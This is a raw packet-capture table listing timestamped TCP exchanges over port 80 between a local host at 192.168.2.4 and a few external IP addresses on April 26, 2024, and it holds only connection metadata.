Apr 26, 2024 10:26:59.710736036 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.710772038 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.710786104 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.710810900 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.710848093 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.710863113 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.710891962 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.710930109 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.710939884 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.710968971 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.711005926 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.711016893 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.711045027 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.711082935 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.711093903 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.711122990 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.711170912 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.964572906 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.964638948 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.964683056 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.964710951 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.964723110 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.964761972 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.964766026 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.964799881 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.964839935 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.964857101 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.964880943 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.964921951 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.964940071 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.964960098 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.964998960 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965020895 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.965038061 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965075970 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965086937 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.965115070 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965153933 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965162992 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.965190887 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965228081 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965265036 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965267897 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.965303898 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965322971 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.965343952 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965382099 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965395927 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.965420008 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965456009 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965468884 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.965495110 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965534925 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965549946 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.965575933 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965615034 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965631008 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.965652943 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965692043 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965711117 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.965728998 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965764999 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965779066 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.965802908 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965838909 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965852976 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.965881109 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.965934992 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.966164112 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.966300011 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.966341019 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.966353893 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.966381073 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.966418982 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.966432095 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.966458082 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.966509104 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.206295967 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.206361055 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.206406116 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.206424952 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.206445932 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.206491947 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.206573009 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.206613064 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.206650972 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.206660986 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.206691027 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.206731081 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.206738949 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.206768990 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.206808090 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.206815004 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.206850052 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.206888914 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.206897020 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.206931114 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.206969976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.206975937 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.207009077 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207047939 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207055092 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.207087994 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207139015 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.207165003 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207401037 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207439899 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207448959 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.207511902 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207552910 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207566023 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.207592010 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207632065 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207638979 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.207672119 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207711935 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207721949 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.207750082 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207791090 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207803011 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.207832098 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207869053 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207878113 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.207909107 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207946062 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.207957983 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.207988024 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208024979 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208034992 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.208065033 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208113909 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.208129883 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208168983 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208205938 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208219051 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.208246946 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208260059 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.208286047 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208293915 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.208323956 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208365917 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208372116 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.208405018 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208442926 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208451986 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.208481073 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208520889 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208528042 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.208559036 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208595991 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208604097 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.208636045 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208677053 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208687067 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.208714008 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208718061 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.208755970 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208761930 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.208797932 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208834887 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208844900 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.208873987 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208913088 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208919048 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.208951950 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208988905 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.208997965 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.209024906 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209064960 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209069967 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.209106922 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209145069 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209146976 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.209182978 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209219933 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209228039 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.209259033 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209297895 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209306002 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.209336996 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209373951 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209383965 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.209410906 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209448099 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209454060 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.209486961 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209525108 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209532022 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.209564924 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209603071 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209609985 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.209640026 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209677935 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209681988 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.209717035 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209754944 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209762096 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.209794044 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.209840059 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.446630955 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.446700096 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.446738958 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.446779013 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.446814060 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.446856976 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.446908951 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447038889 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447079897 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447096109 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.447117090 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447154999 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447195053 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447211981 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.447232962 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447256088 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.447272062 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447308064 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447326899 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.447345018 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447381973 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447402000 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.447418928 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447454929 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447474003 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.447513103 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447552919 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447576046 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.447592020 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447628975 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447643995 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.447664976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447701931 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447726011 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.447737932 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447774887 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447787046 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.447813034 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447853088 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447869062 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.447890997 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447927952 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.447937012 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.447966099 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.448003054 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.448009014 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.448040962 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.448077917 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.448081970 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.448137999 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.448174953 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.448184967 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.448215961 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.448267937 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.449733973 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.449774981 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.449812889 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.449825048 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.449851990 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.449898958 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.449907064 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.449947119 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.449984074 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.449990034 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.450020075 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.450057030 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.450066090 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.450093985 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.450131893 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.450141907 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.450170040 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.450206041 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.450216055 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.450244904 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.450280905 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.450289011 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.450318098 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.450355053 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.450365067 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.450393915 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.450431108 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.450439930 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.450469017 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.450505018 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.450517893 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.450545073 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:27:00.450608969 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:00.450643063 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:27:01.164717913 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:01.406368971 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:01.406541109 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:01.406784058 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:01.647495985 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:01.745906115 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 26, 2024 10:27:01.959661007 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:01.959727049 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:01.961415052 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:02.220983028 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:02.310580969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:02.310647011 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:02.310653925 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:02.310714960 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:02.312845945 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:02.560408115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:02.662957907 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:02.663002968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:02.663033009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:02.663039923 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:02.663058043 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:02.663084030 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:02.663100004 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:02.663136005 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:02.663141966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:02.663187027 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:02.691401958 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:02.691479921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:02.952728033 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:02.952770948 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:02.952805042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:02.953092098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:02.953124046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:02.953231096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.079325914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.079395056 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.370327950 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.476665020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:03.610692978 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.716614008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.716722012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.716726065 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.716808081 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:03.716823101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.716862917 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:03.716871023 CEST	49733	80	192.168.2.4	185.172.128.76
